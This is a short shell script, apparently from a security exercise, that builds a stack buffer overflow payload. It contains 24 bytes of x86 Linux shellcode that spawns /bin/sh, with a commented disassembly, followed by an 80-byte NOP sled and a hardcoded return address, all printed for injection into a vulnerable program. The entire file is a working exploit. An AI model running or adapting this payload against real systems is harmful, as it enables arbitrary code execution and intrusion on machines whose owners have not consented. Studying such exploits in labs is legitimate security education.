| 27 |      1 | #!/bin/sh
 | 
|  |      2 | 
 | 
|  |      3 | // shellscript that overwrites the buffer with 
 | 
|  |      4 | // some payload for opening a shell (the payload
 | 
|  |      5 | // cannot contain any \x00)
 | 
|  |      6 | 
 | 
|  |      7 | 
 | 
|  |      8 | shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" 
 | 
|  |      9 | 
 | 
|  |     10 | # 24 bytes of shellcode
 | 
|  |     11 | 
 | 
|  |     12 | # "\x31\xc0"                      // xorl         %eax,%eax
 | 
|  |     13 | # "\x50"                          // pushl        %eax
 | 
|  |     14 | # "\x68\x6e\x2f\x73\x68"          // pushl        $0x68732f6e
 | 
|  |     15 | # "\x68\x2f\x2f\x62\x69"          // pushl        $0x69622f2f
 | 
|  |     16 | # "\x89\xe3"                      // movl         %esp,%ebx
 | 
|  |     17 | # "\x99"                          // cltd
 | 
|  |     18 | # "\x52"                          // pushl        %edx
 | 
|  |     19 | # "\x53"                          // pushl        %ebx
 | 
|  |     20 | # "\x89\xe1"                      // movl         %esp,%ecx
 | 
|  |     21 | # "\xb0\x0b"                      // movb         $0xb,%al
 | 
|  |     22 | # "\xcd\x80"                      // int          $0x80
 | 
|  |     23 | 
 | 
|  |     24 | padding=`perl -e 'print "\x90" x 80'`
 | 
|  |     25 | 
 | 
|  |     26 | // need s correct address in order to run
 | 
|  |     27 | printf $shellcode$padding"\xe8\xf8\xff\xbf\x00\x00\x00\x00"
 | 
|  |     28 | 
 |